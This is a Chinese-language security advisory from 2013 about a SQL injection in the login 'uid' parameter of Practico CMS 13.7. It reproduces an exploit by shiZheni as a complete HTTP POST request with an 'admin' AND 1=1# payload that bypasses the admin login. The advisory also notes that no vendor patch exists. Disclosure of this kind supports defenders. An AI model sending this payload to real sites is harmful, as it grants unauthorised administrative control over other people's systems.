Practico CMS “uid” SQL注入漏洞
发布日期:2013-09-16
更新日期:2013-09-19
受影响系统:
Practico CMS Practico CMS 13.x
描述:
--------------------------------------------------------------------------------
Practico CMS是快速创建和Web应用程序的视觉框架。
Practico CMS 13.7没有正确验证index.php(当"accion"设置为"Iniciar_login")的uid参数,即将其用在SQL查询中,通过注入任意SQL代码,可导致操作SQL查询。
<*来源:shiZheni
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
############################################################
# ______ __ __ _____ ______ __ __ ____ __ __ _____
# |____ | | | | | |_ __| | ___| | | | | | | | \ | | |__ __|
# / / | | | | | | \ \ | | | | | __| | \ | | | |
# / / | |__| | | | \ \ | |__| | | |__ | \ | | | |
# / / | __ | | | \ \ | __ | | __| | \ | | | |
# / /___ | | | | __| |__ ___\ \ | | | | | |__ | | \ \| | __| |__
# |______| |__| |__| |______| |_____ | |__| |__| |____| |__| \___ | |_____ |
#
############################################################
# Exploit Title: Practico Login SQL Injection
# Date: 2013 - 08 - 12
# Exploit Author: shiZheni
# Software Link: http://www.codigoabierto.org/
# Software Download Link : http://sourceforge.net/projects/practico/files/
# Version: 13.7
# Afected Version : 13.7 < and Last
# Tested on: Window 7 and PHP 5.3.15
==================================================
#1 [ SQLi] Login - Admin ( Total Access )
POST /demo/practico/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Referer: http://localhost/demo/practico/
Host: localhost
Connection: keep-alive
Accept-Encoding: gzip, deflate
accion=Iniciar_login&uid=admin%27+AND+1%3D1%23&clave=password&captcha=mrr6
This vulnerability give you total access and control in the CMS.
建议:
--------------------------------------------------------------------------------
厂商补丁:
Practico CMS
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: